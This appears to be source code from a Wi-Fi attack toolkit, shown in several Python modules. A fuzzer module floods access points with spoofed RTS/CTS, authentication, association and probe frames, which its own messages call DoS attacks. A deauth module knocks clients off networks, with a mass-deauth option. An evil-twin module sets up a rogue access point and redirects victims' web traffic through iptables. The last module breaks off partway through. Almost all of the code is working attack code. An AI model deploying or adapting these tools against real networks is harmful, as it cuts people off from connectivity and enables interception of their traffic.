# fuzzer.py
from scapy.all import *
from scapy.layers.dot11 import Dot11Beacon, Dot11Elt, Dot11ProbeReq, Dot11ProbeResp, Dot11AssoReq, Dot11Auth, Dot11, Dot11Deauth, RadioTap, Dot11AssoResp, Dot11Disas, Dot11QoS
import os
import time
from rich.console import Console
from rich.table import Table
from rich.live import Live
from rich.text import Text
import queue

try:
    from FreewayTools.colors import cprint, iprint, wprint, cinput, ColorCodes

except ModuleNotFoundError:
    from colors import cprint, iprint, wprint, cinput, ColorCodes

def random_mac():
    mac = [random.randint(0x00, 0xff) for _ in range(6)]
    mac[0] = (mac[0] & 0xfe) | 0x02
    return ':'.join(map(lambda x: format(x, '02x'), mac))

def safe_send(*args, **kwargs):
    try:
        sendp(*args, **kwargs)
    except OSError:
        wprint("Network is down, but caught the error")
    except Exception as e:
        wprint(f"In safe_send in fuzzer.py, {e}")

class Sniffer:
    def __init__(self, interface, console, collector, debug=False, target=None, results=None):
        self.interface = interface
        self.collector = collector
        self.console = console
        self.debug = debug
        self.quant = 0
        self.target = target
        self.results = results
        self.authenticated_clients = 0

    def packet_handler(self, packet):
        if thread_event.is_set():
            return
        self.collector.put(packet)
        if self.debug:
            self.console.print(f"Current packet: {packet}", style="green")
        if self.target is not None:
            if packet.haslayer(Dot11Auth) and packet.addr2 == self.target and packet.addr1 != self.target:
                if self.debug:
                    self.console.print(f"Found! AP MAC: {packet.addr2} CLIENT: {packet.addr1}", style="red")
                    self.console.print(f"Adding to results!", style="red")
                
                client_mac = packet.addr1
                if client_mac not in self.results:
                    self.results[client_mac] = True
                    self.authenticated_clients += 1

    def run_sniff(self):
        while not thread_event.is_set():
            try:
                sniff(iface=self.interface, prn=self.packet_handler, store=0, monitor=True)
                time.sleep(1)
            except OSError as e:
                wprint(f"Network error: {e}")

class PacketConstructor:
    def __init__(self, parms, collector, ssid=None):
        self.parms = parms
        self.collector = collector
        self.ssid = ssid if ssid else 0

    def random_duration(self):
        return random.randint(0x0001, 0xFFFE)

    def construct_cts_frame(self, ap_mac):
        duration = self.random_duration()
        cts_frame = RadioTap() / Dot11(type=1, subtype=12, addr1=ap_mac, ID=duration)
        return cts_frame

    def construct_rts_frame(self, src_mac, dest_mac):
        duration = self.random_duration()
        rts_frame = RadioTap() / Dot11(type=1, subtype=11, addr1=dest_mac, addr2=src_mac, addr3=dest_mac, ID=duration)
        return rts_frame

    def construct_auth_frame(self, ap_mac, client_mac, algo=0, seq_num=1, status_code=0):
        auth_frame = RadioTap() / Dot11(type=0, subtype=11, addr1=ap_mac, addr2=client_mac, addr3=ap_mac) / Dot11Auth(algo=algo, seqnum=seq_num, status=status_code)
        return auth_frame

    def construct_asso_frame(self, ap_mac, client_mac):
        ssid = Dot11Elt(ID="SSID", info=self.ssid, len=len(str(self.ssid)))
        asso_frame = RadioTap() / Dot11(type=0, subtype=0, addr1=ap_mac, addr2=client_mac, addr3=ap_mac) / Dot11AssoReq(cap=0x1100, listen_interval=0x00a) / ssid
        return asso_frame

    def construct_probe_req_frame(self, src_mac):
        dot11 = Dot11(type=0, subtype=4, addr1="ff:ff:ff:ff:ff:ff", addr2=src_mac, addr3=src_mac)
        probe_req = Dot11ProbeReq()
        ssid = Dot11Elt(ID="SSID", info=self.ssid, len=len(str(self.ssid)))
        probe_req_frame = RadioTap() / dot11 / probe_req / ssid
        return probe_req_frame

thread_event = threading.Event()

class Fuzzer:
    def __init__(self, interface, parms):
        self.interface = interface  
        self.parms = parms
        self.console = Console()
        self.collector = queue.Queue()
        self.target = cinput("Enter target MAC") if any(x in self.parms for x in ["3", "4", "m"]) else None
        self.total_packets_sent = 0
        self.results = {}
        self.ssid = cinput("Enter target ESSID") if any(x in self.parms for x in ["4", "5", "s"]) else 0
        self.debug = True if "v" in self.parms else False
        self.sniffer = Sniffer(interface=self.interface, console=self.console, collector=self.collector, debug=self.debug, target=self.target, results=self.results)
        self.packet_constructor = PacketConstructor(parms, self.collector, self.ssid)
        self.threads = int(cinput("Enter thread count")) if "t" in self.parms else 1

    def init_monitor_mode(self, mode="monitor"):
        try:
            for interface in self.interface:
                os.system(f'sudo iwconfig {interface} mode {mode}')
        except Exception as e:
            wprint(f"Error while putting interface in monitor mode: {e}")

    def run_fuzzing(self):
        try:
            thread_event.clear()
            self.init_monitor_mode()
            if "1" in self.parms:
                iprint("Starting the Packet Reply attack!")
                threading.Thread(target=self.sniffer.run_sniff, daemon=True).start()
                for i in range(0, self.threads):
                    for interface in self.interface:
                        threading.Thread(target=self.packet_reply, args=(interface,), daemon=True).start()
                while not thread_event.is_set():
                    pass
            elif "2" in self.parms:
                iprint("Starting the RTS/CTS DoS attack!")
                for i in range(0, self.threads):
                    for interface in self.interface:
                        threading.Thread(target=self.rts_spam, args=(interface,), daemon=True).start()
                        threading.Thread(target=self.cts_spam, args=(interface,), daemon=True).start()
                while not thread_event.is_set():
                    pass
            elif "3" in self.parms:
                iprint("Starting the Authentication DoS attack!")
                for i in range(0, self.threads):
                    threading.Thread(target=self.sniffer.run_sniff, daemon=True).start()
                    for interface in self.interface:
                        threading.Thread(target=self.auth_spam, args=(self.target, interface), daemon=True).start()
                with Live(generate_table(self.target, self.sniffer.authenticated_clients, self.total_packets_sent), refresh_per_second=1, console=self.console) as live:
                    while not thread_event.is_set():
                        if self.debug:
                            self.console.print(f"", style="white")
                        live.update(generate_table(self.target, self.sniffer.authenticated_clients, self.total_packets_sent))
                        time.sleep(1)

            elif "4" in self.parms:
                iprint("Starting the Association DoS attack!")
                for i in range(0, self.threads):
                    threading.Thread(target=self.sniffer.run_sniff, daemon=True).start()
                    for interface in self.interface:
                        threading.Thread(target=self.asso_spam, args=(self.target, interface), daemon=True).start()
                
                with Live(generate_table(self.target, self.sniffer.authenticated_clients, self.total_packets_sent), refresh_per_second=1, console=self.console) as live:
                    while not thread_event.is_set():
                        if self.debug:
                            self.console.print(f"", style="white")
                        live.update(generate_table(self.target, self.sniffer.authenticated_clients, self.total_packets_sent))
                        time.sleep(1)

            elif "5" in self.parms:
                iprint("Starting PR spam!")
                for thread in range(0, self.threads):
                    for interface in self.interface:
                        threading.Thread(target=self.probe_spam, args=(interface,), daemon=True).start()
                while not thread_event.is_set():
                    pass
                    
        except KeyboardInterrupt:
            thread_event.set()
            time.sleep(1)  
            self.init_monitor_mode(mode="managed")          

    def probe_spam(self, interface):
        while not thread_event.is_set():
            rmac = random_mac()
            probe_frame = self.packet_constructor.construct_probe_req_frame(rmac)
            safe_send(probe_frame, iface=interface, count=1, verbose=False)
            if self.debug:
                self.console.print(f"Probe Request sent for {rmac}, ssid {self.ssid}", style="green")

    def asso_spam(self, target, interface):
        while not thread_event.is_set():
            client_mac = random_mac()
            asso_frame = self.packet_constructor.construct_asso_frame(target, client_mac)
            safe_send(asso_frame, iface=interface, count=1, verbose=False)
            self.total_packets_sent += 1

    def auth_spam(self, target, interface):
        while not thread_event.is_set():
            client_mac = random_mac()
            auth_frame = self.packet_constructor.construct_auth_frame(target, client_mac)
            safe_send(auth_frame, iface=interface, count=1, verbose=False)
            self.total_packets_sent += 1

    def cts_spam(self, interface):
        while not thread_event.is_set():
            rmac = random_mac()
            cts_frame = self.packet_constructor.construct_cts_frame(rmac)
            safe_send(cts_frame, iface=interface, count=1, verbose=False)
            if self.debug:
                self.console.print(f"CTS frame sent to AP MAC: {rmac} THE CTS: {cts_frame}", style="blue")

    def rts_spam(self, interface):
        src_mac = random_mac()
        while not thread_event.is_set():
            dest_mac = random_mac()
            rts_frame = self.packet_constructor.construct_rts_frame(src_mac, dest_mac)
            safe_send(rts_frame, iface=interface, count=1, verbose=False)
            if self.debug:
                self.console.print(f"RTS frame sent from {src_mac} to {dest_mac}: {rts_frame}", style="blue")

    def packet_reply(self, interface):
        while not thread_event.is_set():
            # self.console.print(f"Collector is empty!", style="yellow")
            if not self.collector.empty():
                packet = self.collector.get()
                safe_send(packet, iface=interface, count=1, verbose=False)
                self.console.print(f"Packet sent! Packet: {packet}", style="blue")

def generate_table(target, authenticated_clients, total_packets_sent):
    table = Table(title=Text("Attack Results", style="bold white"), border_style="white")
    table.add_column(Text("Target AP", style="magenta"))
    table.add_column(Text("Authenticated Clients", style="green"))
    table.add_column(Text("Total Packets Sent", justify="right", style="yellow"))
    
    target_text = Text(str(target), style="magenta")
    auth_clients_text = Text(str(authenticated_clients), style="green")
    packets_sent_text = Text(str(total_packets_sent), style="yellow")

    table.add_row(target_text, auth_clients_text, packets_sent_text)

    return table

if __name__ == "__main__":
    fuzzer = Fuzzer(interface="wlan1", parms={"5": None}, target="70:4f:57:dd:af:40", ssid="RANCZO1")
    fuzzer.run_fuzzing()


# tools/__init__.py

from .colors import cprint, iprint, wprint, cinput, ColorCodes
from .monitor import Monitor
from .deauth import Deauth
from .beacon_spam import BeaconSpam
from .fuzzer import Fuzzer
from .audit import Audit
from .hopper import channel_hopper
from .evil_twin import Cappy, WebServer, shutdown_network, safecall
from .updater import update
__all__ = ['cprint', 'iprint', 'wprint', 'cinput', 'ColorCodes', 'Monitor', 'Deauth', 'BeaconSpam', 'Fuzzer', 'Audit', 'channel_hopper',
           'Cappy', 'WebServer', 'shutdown_network', 'safecall', 'update']


# deauth.py
from scapy.all import *
from scapy.layers.dot11 import Dot11Beacon, Dot11Elt, Dot11ProbeReq, Dot11ProbeResp, Dot11AssoReq, Dot11Auth, Dot11, Dot11Deauth, RadioTap, Dot11AssoResp, Dot11Disas, Dot11QoS
from scapy.layers.eap import EAPOL
import threading
import os
import time
from rich.console import Console
from rich.table import Table
from rich.live import Live

try:
    from FreewayTools.colors import cprint, iprint, wprint, cinput, ColorCodes
    from FreewayTools.monitor import get_signal_strength

except ModuleNotFoundError:
    from colors import cprint, iprint, wprint, cinput, ColorCodes
    from monitor import get_signal_strength

cc = ColorCodes()

class Processor:
    """Handles sniffed packets"""
    def __init__(self, interface, aps, clients, console, debug):
        self.debug = debug
        self.APs = aps
        self.interface = interface
        self.Clients = clients
        self.seen_networks = set()
        self.console = console 
        self.last_cl_mac = ""
        self.pairs = {}

    def extract_channel(self, packet):
        channel = "N/A"
        if packet.haslayer(RadioTap):
            try:
                channel = ord(packet[Dot11Elt:3].info)
            except Exception as e:
                if self.debug:
                    self.console.print(f"In function extract_channel: {type(e).__name__}: {str(e)}")
        return channel

    def entry_handler(self, packet):
        if stop_event.is_set():
            return
        """Prepares packet for pairs population"""
        if packet.haslayer(Dot11):
            ptype = self.get_packet_type(packet)

            if ptype == "Beacon":
                ap_mac = packet.addr2
                channel = self.extract_channel(packet)

                if ap_mac not in self.APs:
                    self.APs[ap_mac] = {"mac": ap_mac, "signal": get_signal_strength(packet), "channel": channel}
                
                ssid = packet[Dot11Elt].info.decode('utf-8', 'ignore') if packet[Dot11Elt].info else "Hidden SSID"
                
                if ssid is not None:
                    self.APs[ap_mac]["ssid"] = ssid
                    self.APs[ap_mac]["signal"] = get_signal_strength(packet)

                if ap_mac not in self.seen_networks:
                    self.seen_networks.add(ap_mac)
                    if self.debug:
                        self.console.print(f"Found new network {ap_mac} -- {ssid}", style="green")
                        print(self.pairs)
                return
            elif ptype == "Probe Request":
                cl_mac = packet.addr2
                if cl_mac == self.last_cl_mac:
                    return

                broadcast = packet.addr1

                if cl_mac != "FF:FF:FF:FF:FF:FF" and cl_mac not in self.Clients:
                    self.Clients[cl_mac] = {"mac": cl_mac, "signal": get_signal_strength(packet), "ssid": "Unknown"}
                if self.debug:
                    self.console.print(f"Found Probe Request from {cl_mac} TO {broadcast}", style="yellow")

                self.last_cl_mac = cl_mac
                return
            elif ptype == "Probe Response":
                cl_mac = packet.addr1
                ap_mac = packet.addr2
                ssid = f"{self.APs[ap_mac]['ssid']}: {ap_mac}" if ap_mac in self.APs else None
                
                if cl_mac not in self.Clients:
                    self.Clients[cl_mac] = {"mac": cl_mac, "signal": get_signal_strength(packet), "ssid": ssid if ssid else "Unknown"}
                if self.debug:
                    self.console.print(f"Found Probe Response from AP {ssid if ssid else ap_mac} TO: {cl_mac} / {packet}", style="yellow")
            elif ptype == "Association":
                cl_mac = packet.addr1
                ap_mac = packet.addr2
                ssid = f"{self.APs[ap_mac]['ssid']}: {ap_mac}" if ap_mac in self.APs else None
                if cl_mac not in self.Clients:
                    self.Clients[cl_mac] = {"mac": cl_mac, "signal": get_signal_strength(packet), "ssid": ssid if ssid else "Unknown"}
                if self.debug:
                    self.console.print(f"Found Asso Request from {ssid if ssid else ap_mac} TO: {cl_mac} / {packet}", style="blue")
            elif ptype == "Authentication":
                cl_mac = packet.addr1
                ap_mac = packet.addr2
                ssid = f"{self.APs[ap_mac]['ssid']}: {ap_mac}" if ap_mac in self.APs else None
                if cl_mac not in self.Clients:
                    self.Clients[cl_mac] = {"mac": cl_mac, "signal": get_signal_strength(packet), "ssid": ssid if ssid else "Unknown"}
                if self.debug:
                    self.console.print(f"Found Authentication Response from {ssid if ssid else ap_mac} TO: {cl_mac} / {packet}", style="green")
            else:
                if ptype in ["Other"]:
                    return
                cl_mac = packet.addr1 if ptype not in ["CTS", "RTS"] else packet[Dot11].addr2
                ap_mac = packet.addr2 if ptype not in ["CTS", "RTS"] else packet[Dot11].addr1
                ssid = f"{self.APs[ap_mac]['ssid']}: {ap_mac}" if ap_mac in self.APs else None
                if cl_mac not in self.Clients:
                    self.Clients[cl_mac] = {"mac": cl_mac, "signal": get_signal_strength(packet), "ssid": ssid if ssid else "Unknown"}
                if self.debug:
                    self.console.print(f"Found Packet with type {ptype} from {ssid if ssid else ap_mac} TO: {cl_mac} / {packet}", style="green")

            if cl_mac is not None and ap_mac is not None and cl_mac != ap_mac:
                self.populate_pairs(cl_mac, ap_mac)
    
    def get_packet_type(self, packet):
        """Determines the type of a WiFi packet."""
        if packet.haslayer(Dot11Beacon):
            return "Beacon"
        elif packet.haslayer(Dot11ProbeReq):
            return "Probe Request"
        elif packet.haslayer(Dot11ProbeResp):
            return "Probe Response"
        elif packet.haslayer(Dot11AssoReq) or packet.haslayer(Dot11AssoResp):
            return "Association"
        elif packet.haslayer(Dot11Auth):
            return "Authentication"
        elif packet.haslayer(Dot11Deauth):
            return "Deauthentication"
        elif packet.haslayer(Dot11Disas):
            return "Disassociation"
        elif packet.haslayer(Dot11QoS):
            return "QoS Data"
        else:
            if packet.type == 1:
                subtype = packet.subtype
                if subtype == 0x09:
                    return "Block Ack Req"
                elif subtype == 0x0b:
                    return "Block Ack"
                elif subtype == 0x0B:
                    return "RTS"
                elif subtype == 0x0C:
                    return "CTS"
            return "Other"

    def populate_pairs(self, cl_mac, ap_mac):
        if cl_mac in self.APs:
            return

        if "ff:ff:ff:ff:ff:ff" not in [cl_mac, ap_mac]:
            if cl_mac in self.pairs:
                self.pairs[cl_mac]['ap'] = ap_mac
                if ap_mac in self.APs:
                    self.pairs[cl_mac]['ssid'] = self.APs[ap_mac]['ssid']
                    self.pairs[cl_mac]['channel'] = self.APs[ap_mac]['channel']
            else:
                signal = self.APs[ap_mac]['signal'] if ap_mac in self.APs else -99
                ssid = self.APs[ap_mac]['ssid'] if ap_mac in self.APs else "Unknown"
                if ssid == "Unknown":
                    return
                channel = self.APs[ap_mac]['channel'] if ap_mac in self.APs else "N/A"
                self.pairs[cl_mac] = {
                    "ap": ap_mac,
                    "dframes": 0,
                    "signal": signal,
                    "timestamp": time.strftime("%H:%M"),
                    "ssid": ssid,
                    "channel": channel
                }

            if self.debug:
                self.console.print(f"Updated pairs dictionary: {self.pairs}", style="bright_yellow")

stop_event = threading.Event()

class DeauthWorker:
    """Deauthing process, takes pairs, crafts deauth packets and sends them"""
    def __init__(self, interface, processor, stop_event, ap_from_ap=False, mass_deauth=False, whitelist_data=None, target=None, channel=None, essid=None, drange=None):
        self.stop_event = stop_event
        self.interface = interface
        self.whitelist_data = whitelist_data
        self.processor = processor
        self.target = target
        self.channel = channel
        self.essid = essid
        self.range = drange
        self.ap_from_ap = ap_from_ap
        self.mass_deauth = mass_deauth
        self.thread_collector = {}

    def run(self):
        thread_started = False
        while not self.stop_event.is_set():
            try:
                if self.mass_deauth:
                    while not self.processor.APs:  
                        time.sleep(0.5)  
                    aps_list = list(self.processor.APs.keys())
                    for ap in aps_list:
                        if ap in self.whitelist_data:
                            continue

                        if ap not in self.thread_collector:
                            self.thread_collector[ap] = {"started": False}

                        if not self.thread_collector[ap]['started']:
                            threading.Thread(target=self.client_deauth_thread_, args=(ap,), daemon=True).start()
                            self.thread_collector[ap] = {"started": True}

                elif self.ap_from_ap:
                    if not thread_started:
                        threading.Thread(target=self.client_deauth_thread_, args=(self.target,), daemon=True).start()
                        thread_started = True
                else:
                    clients_list = list(self.processor.pairs.keys())
                    for client_mac in clients_list:
                        if client_mac in self.whitelist_data:
                            continue

                        if client_mac not in self.thread_collector:
                            self.thread_collector[client_mac] = {"started": False}
                        
                        if not self.thread_collector[client_mac]['started']:
                            threading.Thread(target=self.client_deauth_thread_, args=(client_mac,), daemon=True).start()
                            self.thread_collector[client_mac] = {"started": True}

            except OSError as e:
                wprint(f"Network error: {e}")
            except KeyboardInterrupt:
                break
            except Exception as e:
                wprint(f"Unexpected error: {e}")
                time.sleep(2)
            
    def client_deauth_thread_(self, client_mac):
        while not self.stop_event.is_set():
            try:

                if self.ap_from_ap:
                    self._deauth_("FF:FF:FF:FF:FF:FF", client_mac, self.interface)
                    continue
                elif self.mass_deauth:
                    self._deauth_("FF:FF:FF:FF:FF:FF", client_mac, self.interface)
                    continue

                details = self.processor.pairs.get(client_mac, {})
                ap_mac = details.get("ap")
                if ap_mac is None:
                    wprint("AP Mac is None!")
                    return
                channel = details.get("channel")
                ssid = details.get("ssid")
                signal = details.get("signal")
                if self.target is not None:
                    if ap_mac == self.target or client_mac == self.target:
                        self._deauth_(client_mac, ap_mac, self.interface, details)
                elif self.channel is not None:
                    if str(self.channel) == str(channel):
                        self._deauth_(client_mac, ap_mac, self.interface, details)
                elif self.essid is not None:
                    if str(self.essid) == str(ssid):
                        self._deauth_(client_mac, ap_mac, self.interface, details)
                elif self.range is not None:
                    if -int(self.range) < int(signal) if signal is not None else -99:
                        self._deauth_(client_mac, ap_mac, self.interface, details)
                else:
                    self._deauth_(client_mac, ap_mac, self.interface, details)

            except OSError as e:
                wprint(f"Network error: {e}")
            except Exception as e:
                wprint(f"Unexpected error: {e}")
                time.sleep(2)

    def _deauth_(self, client_mac, ap_mac, interface, pair=None):
        if self.mass_deauth:
            client_mac = "FF:FF:FF:FF:FF:FF"
        dot11 = Dot11(addr1=client_mac, addr2=ap_mac, addr3=ap_mac)
        deauth = Dot11Deauth(reason=7)
        packet = RadioTap()/dot11/deauth
        iprint(f"Deauthing {client_mac} from {ap_mac}")  
        bullets = random.randint(25, 40)
        sendp(packet, iface=interface, count=bullets, inter=0.01, verbose=False)
        if pair:
            pair["dframes"] += bullets

class Deauth:
    def __init__(self, interface, parm):
        self.interface = interface
        self.parm = parm
        self.whitelist_data = []
        self.APs = {}
        self.Clients = {}
        self.console = Console()
        self.ap_from_ap = True if "7" in self.parm else False
        self.mass_deauth = True if "8" in self.parm else False
        self.debug = True if "9" in self.parm else False
        self.processor = Processor(self.interface, self.APs, self.Clients, self.console, self.debug)
        self.target = cinput("Enter target MAC").lower() if "1" in self.parm or "2" in self.parm or "7" in self.parm else None
        self.channel = cinput("Enter target channel") if "3" in self.parm else None
        self.essid = cinput("Enter target ESSID") if "4" in self.parm else None
        self.range = cinput("Enter max. range (number)") if "5" in self.parm else None
        self.whitelist = self.handle_whitelist() if "w" in self.parm else None

    def safecall(self, cmd):
        try:
            os.system(f'{cmd}')
        except Exception as e:
            if self.debug:
                self.console.print(f"Error when calling {cmd}")

    def handle_whitelist(self):
        w_path = "/usr/local/share/3way/whitelist.txt"
        print(f"{cc.RED}\tAddresses:")
        self.safecall("ifconfig | awk '/^[a-zA-Z]/ {iface=$1} /ether/ {print iface $2}'")        
        while True:
            mac_to_add = cinput("Add MAC Address to whitelist.txt (press Enter to skip)")
            if len(mac_to_add) == 17: 
                try:
                    with open(w_path, "a" if os.path.exists(w_path) else "w") as f:
                        f.write(f"{mac_to_add}\n")

                except Exception as e:
                    if self.debug:
                        self.console.print(f"Couldn't add {mac_to_add}, {e}")

            if mac_to_add == "":
                break
        
        try:
            with open(w_path, "r") as f:
                data = f.read()
                self.whitelist_data = data.split("\n")
                self.console.print(f"{self.whitelist_data}")

        except Exception as e:
            if self.debug:
                self.console.print(f"Couldn't read whitelist.txt, {str(e)}")

    def init_monitor_mode(self, mode="monitor"):
        try:
            for interface in self.interface:
                os.system(f'sudo iwconfig {interface} mode {mode}')
        except Exception as e:
            wprint(f"Error while putting interface in monitor mode: {e}")

    def sfilter(self, x):
        return True if stop_event.is_set() else False

    def start_sniff(self):
        while not stop_event.is_set():
            try:
                sniff(iface=self.interface, prn=self.processor.entry_handler, stop_filter=self.sfilter, store=0, monitor=True)
            except OSError as e:
                wprint(f"Network error: {e}")
                self.run_deauthy()

    def display_live_table(self):
        with Live(generate_table(self.processor.pairs.copy()), refresh_per_second=10, console=self.console) as live:  # Refresh 10 times per second
            while not stop_event.is_set():
                live.update(generate_table(self.processor.pairs.copy()), refresh=True)
                time.sleep(1)

    def run_deauthy(self):
        stop_event.clear()
        try:
            self.init_monitor_mode()
            for interface in self.interface:
                if self.target is not None:
                    deauth_worker = DeauthWorker(interface, self.processor, stop_event, self.ap_from_ap, self.mass_deauth, self.whitelist_data, target=self.target)
                elif self.channel is not None:
                    deauth_worker = DeauthWorker(interface, self.processor, stop_event, self.ap_from_ap, self.mass_deauth, self.whitelist_data, channel=self.channel)
                elif self.essid is not None:
                    deauth_worker = DeauthWorker(interface, self.processor, stop_event, self.ap_from_ap, self.mass_deauth, self.whitelist_data, essid=self.essid)
                elif self.range is not None:
                    deauth_worker = DeauthWorker(interface, self.processor, stop_event, self.ap_from_ap, self.mass_deauth, self.whitelist_data, drange=self.range)
                else:
                    deauth_worker = DeauthWorker(interface, self.processor, stop_event, self.ap_from_ap, self.mass_deauth, self.whitelist_data)
                    
                deauth_thread = threading.Thread(target=deauth_worker.run, daemon=True).start()

            if self.ap_from_ap:
                while True:
                    pass
                return

            sniff_thread = threading.Thread(target=self.start_sniff, daemon=True).start()
            self.display_live_table()

        except KeyboardInterrupt:
            stop_event.set()
            time.sleep(1)
        finally:
            self.init_monitor_mode(mode="managed")

def generate_table(pairs):
    table = Table()
    table.add_column("Access Point", style="magenta")
    table.add_column("Device", style="cyan")
    table.add_column("D. Frames", justify="right", style="green")
    table.add_column("  🌐  ", justify="center", style="green")
    table.add_column("L. Beacon", justify="right", style="green")
    table.add_column("ESSID", justify="right", style="blue")
    table.add_column("Channel", justify="right", style="yellow")

    for client_mac, pair in pairs.items():
        ap_mac = pair["ap"]
        client_mac = client_mac
        deauth_frames_count = pair["dframes"] if "dframes" in pair else 0
        signal = pair["signal"]
        timestamp = pair["timestamp"]
        ssid = pair["ssid"]
        channel = pair["channel"]
        table.add_row(ap_mac, client_mac, str(deauth_frames_count), str(signal) + "dbm", timestamp, ssid, str(channel))
    return table

if __name__ == "__main__":
    # For testing purposes
    Deauth(["wlan2"], parm={}).run_deauthy()


# EvilTwin Cappy
# by FLOCK4H
# v1.0.2

import os, shutil, time, sys, subprocess, json
from .colors import wprint, ColorCodes, iprint, cprint, cinput
from http.server import SimpleHTTPRequestHandler, HTTPServer
import threading
import random

cc = ColorCodes()

script_dir = "/usr/local/share/3way"

def random_mac_address():
    mac = [0x00, 0x16, 0x3e,
           random.randint(0x00, 0x7f),
           random.randint(0x00, 0xff),
           random.randint(0x00, 0xff)]
    return ':'.join(map(lambda x: f"{x:02x}", mac))

def change_mac_address(interface, mac="random"):
    new_mac = random_mac_address() if mac == "random" else mac
    try:
        subprocess.run(['sudo', 'ifconfig', interface, 'down'], check=True)
        subprocess.run(['sudo', 'ifconfig', interface, 'hw', 'ether', new_mac], check=True)
        subprocess.run(['sudo', 'ifconfig', interface, 'up'], check=True)
        cprint(f"MAC address for {interface} changed to {new_mac}")
        time.sleep(1.2)
    except subprocess.CalledProcessError as e:
        print(f"Failed to change MAC address: {e}")

def check_dependencies(dependencies):
    for dep in dependencies:
        result = subprocess.run(["which", dep], capture_output=True, text=True)
        if result.returncode != 0:
            wprint(f"{dep} is not installed. Please install {dep} and try again.")
            install = cinput(f"Install {dep} now? (Y/n)")
            if install.lower() == "y":
                if dep == "lighttpd":
                    os.system("sudo apt-get update")
                os.system(f"sudo apt-get install {dep}")
                cprint(f"{dep} successfully installed!")
                time.sleep(1.5)
        else:
            iprint(f"{dep} is installed.")
        time.sleep(0.2)

def mod_path(path, mod="copy"):
    if mod == "ren" and os.path.exists(f"{path}.copy"):
        os.remove(path)
        shutil.move(f"{path}.copy", path)

    if os.path.exists(path):
        shutil.copy(path, f"{path}.copy") 

def safecall(cmd, post_scriptum=""):
    result = os.system(cmd)
    if result != 0:
        if post_scriptum == "dnsmasq_issue":
            print(f"{cc.BLUE}Running 'sudo apt-get install dnsmasq' to fix dnsmasq!")
            os.system(f"sudo apt-get install dnsmasq")
        print(f"{cc.YELLOW}Catched command failure, but {cc.GREEN}continuing{cc.YELLOW}: {cmd}{cc.RESET}")
    return result

def delete_iptables_rule(table, rule):
    check_command = f"sudo iptables -t {table} -C {rule}"
    delete_command = f"sudo iptables -t {table} -D {rule}"
    if safecall(check_command) == 0:
        safecall(delete_command)

class Adapter:
    def __init__(self, inf=["wlan0"]):
        self.interfaces = inf
        self.interface = inf[0]
        self.init_adapter()

    def init_adapter(self, mode="managed"):
        try:
            for interface in self.interfaces:
                os.system(f'sudo iwconfig {interface} mode {mode}')
        except Exception as e:
            wprint(f"Error while putting interface in monitor mode: {e}")

class Config:
    def __init__(self, inf, ssid, channel, driver="nl80211", hw_mode="g", ip_addr="10.0.0.15"):
        self.interface = inf
        self.ssid = ssid
        self.channel = channel
        self.ip_addr = ip_addr
        self.ip_range = '.'.join(ip_addr.split('.')[:-1])
        cprint(f"Initialized with {self.ip_addr} {self.ip_range}-20-150")
        time.sleep(1)

        self.driver = driver
        self.hw_mode = hw_mode
        self.run_config()

    def run_config(self):
        cprint("Disconnecting from current network...")
        safecall(f"sudo nmcli device disconnect {self.interface[0] if self.interface else 'wlan0'}")

        if self.interface is None:
            self.interface = ["wlan0"]

        self.adapter = Adapter(inf=self.interface)
        self.wlan = self.adapter.interface

        mod_path(path="/etc/hostapd/hostapd.conf")
        mod_path(path="/etc/default/hostapd")
        mod_path(path="/etc/dnsmasq.conf")
        mod_path(path="/etc/network/interfaces")
        self.write_config(interface=self.wlan, ssid=self.ssid, channel=self.channel, driver=self.driver, hw_mode=self.hw_mode)

        self.write_to_config("/etc/default/hostapd", f"DAEMON_CONF=/etc/hostapd/hostapd.conf")
        self.write_to_config("/etc/dnsmasq.conf", f"""interface={self.wlan}\ndhcp-range={self.ip_range}.20,{self.ip_range}.150,12h""")
        self.write_to_config("/etc/network/interfaces", f"#")
    
    def ip_config(self, wlans):
        for wlan in wlans:
            iprint("Configuring IP adresses...")
            safecall(f"sudo ifconfig {wlan} {self.ip_addr} netmask 255.255.255.0 up")
            safecall(f"sudo sh -c \"echo 1 > /proc/sys/net/ipv4/ip_forward\"")
            safecall(f"sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE")
            safecall(f"sudo iptables -t nat -A PREROUTING -i {wlan} -p tcp --dport 80 -j DNAT --to-destination {self.ip_addr}")
            safecall(f"sudo iptables -A FORWARD -i {wlan} -p tcp --dport 80 -d {self.ip_addr} -j ACCEPT")

    def handle_services(self):
        safecall("sudo systemctl unmask hostapd")
        cprint("Hostapd was unmasked...")

        safecall(f"sudo systemctl stop dnsmasq", "dnsmasq_issue")
        cprint("Stopped dnsmasq")

        safecall(f"sudo systemctl stop hostapd")
        cprint("Stopped hostapd")

        safecall(f"sudo systemctl daemon-reload")
        iprint("Starting dnsmasq...")
        safecall(f"sudo systemctl start dnsmasq", "dnsmasq_issue")
        time.sleep(2)

    def handle_networking(self, wlans):
        for wlan in wlans:
            safecall(f"sudo ifconfig {wlan} up")
            iprint("Restarting networking service...")
            safecall(f"sudo systemctl restart networking")

    def write_config(self, **kwargs):
        interface = kwargs.pop("interface", "wlan0")
        driver = kwargs.pop("driver", "nl80211")
        ssid = kwargs.pop("ssid", "EvilTwin")
        hw_mode = kwargs.pop("hw_mode", "g")
        channel = str(kwargs.pop("channel", 10))
        macaddr_acl= kwargs.pop("macaddr_acl", "0")
        auth_algs = kwargs.pop("auth_algs", "1")
        ignore_broadcast_ssid = kwargs.pop("ignore_broadcast", "0")

        try:
            with open("/etc/hostapd/hostapd.conf", "w") as f:
                f.write(
    f"""interface={interface}
driver={driver}
ssid={ssid}
hw_mode={hw_mode}
channel={channel}
macaddr_acl={macaddr_acl}
auth_algs={auth_algs}
ignore_broadcast_ssid={ignore_broadcast_ssid}
logger_syslog=-1
logger_syslog_level=0
logger_stdout=-1
logger_stdout_level=0
""".lstrip()
                )
        except Exception as e:
            wprint(f'Error, couldn\'t save to the /etc/hostapd/hostapd.conf, {e}')
    
    def write_to_config(self, path, text):
        try:
            with open(path, "w") as f:
                f.write(text)
        except Exception as e:
            wprint(f'Error, couldn\'t save to the {path})')

def shutdown_network(wlans, ip_addr):
    for wlan in wlans:
        print("")
        iprint("Stopping dnsmasq...")
        safecall(f"sudo systemctl stop dnsmasq")
        iprint("Stopping hostapd...")
        safecall(f"sudo systemctl stop hostapd")

        safecall(f"sudo systemctl daemon-reload")
        iprint("Changing back the IP settings...")
        safecall(f"sudo sh -c \"echo 0 > /proc/sys/net/ipv4/ip_forward\"")
        delete_iptables_rule(f"nat", f"POSTROUTING -o eth0 -j MASQUERADE")
